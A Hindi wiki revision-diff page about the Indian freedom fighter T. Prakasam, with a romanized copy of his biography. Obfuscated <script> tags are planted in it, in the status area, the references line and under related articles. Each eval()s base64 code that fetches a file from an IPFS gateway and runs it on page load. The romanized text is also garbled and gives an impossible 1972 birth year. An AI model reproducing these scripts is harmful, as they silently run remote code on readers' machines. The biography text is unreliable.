Difference between revisions of "टी. प्रकाशम"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
(''''टी. प्रकाशम''' प्रसिद्ध स्वतंत्रता सेनानी और [[आंध्र ...' के साथ नया पन्ना बनाया)
 
m (Text replace - "रूपये" to "रुपये")
Line 4: Line 4:
 
अपने मित्रों के आग्रह पर 1904 ई. में टी. प्रकाशम बैरिस्टरी की शिक्षा के लिए इंग्लैण्ड गए। [[भारत]] लौटने पर 1907 ई. में उन्होंने मद्रास में बैरिस्टरी आरंभ की और शीघ्र ही उनकी गणना प्रमुख बैरिस्टरों में होने लगी।
 
अपने मित्रों के आग्रह पर 1904 ई. में टी. प्रकाशम बैरिस्टरी की शिक्षा के लिए इंग्लैण्ड गए। [[भारत]] लौटने पर 1907 ई. में उन्होंने मद्रास में बैरिस्टरी आरंभ की और शीघ्र ही उनकी गणना प्रमुख बैरिस्टरों में होने लगी।
 
====गाँधी जी से भेंट====
 
====गाँधी जी से भेंट====
प्रकाशम ने 15 वर्षों तक खूब धन कमाया और सुखपूर्वक जीवन व्यतीत किया। इन्हीं दिनों उन्होंने ‘लॉ टाइम्स’ नामक पत्र का संपादन किया, प्रिवी कौंसिल में मुकदमा लड़ने के लिए दो बार इंग्लैण्ड भी गए। वहाँ उनकी भेंट प्रथम बार गाँधी जी से हुई। गाँधी जी के विचारों का उन पर बहुत प्रभाव पड़ा। देश में संपन्नता के चारों ओर फैली गरीबी को वे देख चुके थे। देश की स्वाधीनता के लिए गाँधी जी ने जो पहला आंदोलन आरंभ किया, टी. प्रकाशम भी अपनी लाखों रूपये की बैरिस्टरी त्यागकर उस आंदोलन में सम्मिलित हो गए। 1921 से आगामी 13 वर्षों तक वे [[आंध्र प्रदेश]] में कांग्रेस कमेटी के अध्यक्ष रहे। उन्होंने राष्ट्रीय भावनाओं के प्रचार के लिए 1921 में ‘स्वराज्य’ नामक दैनिक पत्र का प्रकाशन किया और 15 वर्ष तक अपने व्यय से इसे चलाते रहे।
+
प्रकाशम ने 15 वर्षों तक खूब धन कमाया और सुखपूर्वक जीवन व्यतीत किया। इन्हीं दिनों उन्होंने ‘लॉ टाइम्स’ नामक पत्र का संपादन किया, प्रिवी कौंसिल में मुकदमा लड़ने के लिए दो बार इंग्लैण्ड भी गए। वहाँ उनकी भेंट प्रथम बार गाँधी जी से हुई। गाँधी जी के विचारों का उन पर बहुत प्रभाव पड़ा। देश में संपन्नता के चारों ओर फैली गरीबी को वे देख चुके थे। देश की स्वाधीनता के लिए गाँधी जी ने जो पहला आंदोलन आरंभ किया, टी. प्रकाशम भी अपनी लाखों रुपये की बैरिस्टरी त्यागकर उस आंदोलन में सम्मिलित हो गए। 1921 से आगामी 13 वर्षों तक वे [[आंध्र प्रदेश]] में कांग्रेस कमेटी के अध्यक्ष रहे। उन्होंने राष्ट्रीय भावनाओं के प्रचार के लिए 1921 में ‘स्वराज्य’ नामक दैनिक पत्र का प्रकाशन किया और 15 वर्ष तक अपने व्यय से इसे चलाते रहे।
 
==आंध्र केसरी की उपाधि==
 
==आंध्र केसरी की उपाधि==
 
आंदोलनों में भाग लेने के कारण उन्होंने जेल की सजाएँ भोगीं। 1927 में [[साइमन कमीशन]] के विरोध में आयोजित प्रदर्शन पर पुलिस द्वारा की गई गोलाबारी के बीच से मृत और घायल व्यक्तियों को निकालने के लिए वे ही आगे बढ़े थे। तभी से वे ‘आंध्र केसरी’ के नाम से प्रसिद्ध हो गए। 1937 में जब देश में पहले कांग्रेसी मंत्रिमंडल स्थापित हुए तो टी. प्रकाशम [[सी. राजगोपालाचारी]] के मंत्रिमंडल में राजस्वमंत्री के रूप में सम्मिलित हुए। द्वितीय विश्वयुद्ध के बाद, अप्रैल 1946 में वे संयुक्त [[मद्रास]] प्रदेश के [[मुख्यमंत्री]] बने और लगभग 13 महीनों तक इस पद पर रहकर उन्होंने समाज-सुधार और आर्थिक उन्नति की कई योजनाएँ आरंभ की।
 
आंदोलनों में भाग लेने के कारण उन्होंने जेल की सजाएँ भोगीं। 1927 में [[साइमन कमीशन]] के विरोध में आयोजित प्रदर्शन पर पुलिस द्वारा की गई गोलाबारी के बीच से मृत और घायल व्यक्तियों को निकालने के लिए वे ही आगे बढ़े थे। तभी से वे ‘आंध्र केसरी’ के नाम से प्रसिद्ध हो गए। 1937 में जब देश में पहले कांग्रेसी मंत्रिमंडल स्थापित हुए तो टी. प्रकाशम [[सी. राजगोपालाचारी]] के मंत्रिमंडल में राजस्वमंत्री के रूप में सम्मिलित हुए। द्वितीय विश्वयुद्ध के बाद, अप्रैल 1946 में वे संयुक्त [[मद्रास]] प्रदेश के [[मुख्यमंत्री]] बने और लगभग 13 महीनों तक इस पद पर रहकर उन्होंने समाज-सुधार और आर्थिक उन्नति की कई योजनाएँ आरंभ की।

Revision as of 09:24, 8 December 2011

ti. prakasham prasiddh svatantrata senani aur aandhr pradesh ke pratham mukhyamantri the. inaka janm 23 agast, 1972 ee. mean guntoor zile ke kanaparti namak gaanv mean hua tha. ti. prakasham ka poora nam 'tangatoori prakasham' tha. inaki alpayu mean hi pita ka dehant ho gaya tha. inhoanne pahale madras aur phir ianglaind se bairistari ki padhaee ki thi. ianglaind mean do mukadamoan ki pairavi bhi inhoanne ki thi, aur isi samay mahatma gaandhi se inaka pratham bar sakshatkar hua. desh mean vyapt garibi ko ti. prakasham ne kafi qarib se dekha tha, isilie gaandhi ji ke pratham andolan ke samay inhoanne apani lakhoan rupaye ki bairistari ka tyag kar diya.

shiksha tatha vyavasay

ti. prakasham ke pita 'gopal krishnaaiya' ka jaldi dehaant ho jane ke karan maan ne ek hotal kholakar b de parishram se unaka palan-poshan kiya. madras se qanoon ki shiksha prapt karake unhoanne rajamuandri mean vakalat shuroo ki. shighr hi unhoanne is kshetr mean b da nam kamaya. 29 varsh ki umr mean ti. prakasham rajamuandri nagarapalika ke adhyaksh chune ge the. apane mitroan ke agrah par 1904 ee. mean ti. prakasham bairistari ki shiksha ke lie ianglaind ge. bharat lautane par 1907 ee. mean unhoanne madras mean bairistari aranbh ki aur shighr hi unaki ganana pramukh bairistaroan mean hone lagi.

gaandhi ji se bheant

prakasham ne 15 varshoan tak khoob dhan kamaya aur sukhapoorvak jivan vyatit kiya. inhian dinoan unhoanne ‘l aau taims’ namak patr ka sanpadan kiya, privi kauansil mean mukadama l dane ke lie do bar ianglaind bhi ge. vahaan unaki bheant pratham bar gaandhi ji se huee. gaandhi ji ke vicharoan ka un par bahut prabhav p da. desh mean sanpannata ke charoan or phaili garibi ko ve dekh chuke the. desh ki svadhinata ke lie gaandhi ji ne jo pahala aandolan aranbh kiya, ti. prakasham bhi apani lakhoan rupaye ki bairistari tyagakar us aandolan mean sammilit ho ge. 1921 se agami 13 varshoan tak ve aandhr pradesh mean kaangres kameti ke adhyaksh rahe. unhoanne rashtriy bhavanaoan ke prachar ke lie 1921 mean ‘svarajy’ namak dainik patr ka prakashan kiya aur 15 varsh tak apane vyay se ise chalate rahe.

aandhr kesari ki upadhi

aandolanoan mean bhag lene ke karan unhoanne jel ki sajaean bhogian. 1927 mean saiman kamishan ke virodh mean ayojit pradarshan par pulis dvara ki gee golabari ke bich se mrit aur ghayal vyaktiyoan ko nikalane ke lie ve hi age badhe the. tabhi se ve ‘aandhr kesari’ ke nam se prasiddh ho ge. 1937 mean jab desh mean pahale kaangresi mantrimandal sthapit hue to ti. prakasham si. rajagopalachari ke mantrimandal mean rajasvamantri ke roop mean sammilit hue. dvitiy vishvayuddh ke bad, aprail 1946 mean ve sanyukt madras pradesh ke mukhyamantri bane aur lagabhag 13 mahinoan tak is pad par rahakar unhoanne samaj-sudhar aur arthik unnati ki kee yojanaean aranbh ki.

aandhr pradesh ka gathan

bhashavar pradeshoan ke gathan ke adhar par alag aandhr pradesh ki sthapana ke lie potthi shriramaloo ne 15 disanbar, 1952 ee. ko atmadah kar liya, to usake bad 1 aktoobar, 1953 ee. ko aandhr ka kshetr madras se alag karake naya rajy bana diya gaya. is ne rajy ke pratham mukhyamantri aandhr kesari ti. prakasham hi bane. is rajy ki sthapana ke lie vahaan 40 varshoan se aandolan chal raha tha, parantu ‘vishal aandhr pradesh’ aktoobar, 1956 mean hi ban paya. is prakar ti. prakasham ne apane jivan mean hi apani yah akaanksha poori hote dekhi.

mrityu

andhr pradesh rajy ki sthapana ke kuchh samay bad hi 20 mee, 1957 ko ti. prakasham ka dehant ho gaya. aj bhi unhean andhr mean ve b de samman ke sath yad kiya jata hai.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script> <script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

bharatiy charit kosh |lekhak: liladhar sharma 'parvatiy' |prakashak: shiksha bharati, madarasa rod, kashmiri get, dilli |prishth sankhya: 343-344 | <script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>